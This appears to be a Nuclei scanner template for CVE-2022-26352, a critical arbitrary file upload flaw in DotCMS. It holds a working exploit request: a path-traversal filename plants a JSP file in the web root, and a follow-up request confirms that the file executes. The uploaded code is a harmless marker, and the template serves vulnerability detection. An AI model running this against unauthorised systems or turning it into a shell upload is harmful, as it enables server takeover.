id: CVE-2022-26352 info: name: DotCMS - Arbitrary File Upload author: h1ei1 severity: critical description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. reference: - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26352 cwe-id: CWE-22,CWE-434 tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive requests: - raw: - | POST /api/content/ HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 --------------------------aadc326f7ae3eac3 Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" Content-Type: text/plain <% out.println("CVE-2022-26352"); %> --------------------------aadc326f7ae3eac3-- - | GET /{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "CVE-2022-26352")' - 'status_code_2 == 200' condition: and # Enhanced by mp on 2022/05/19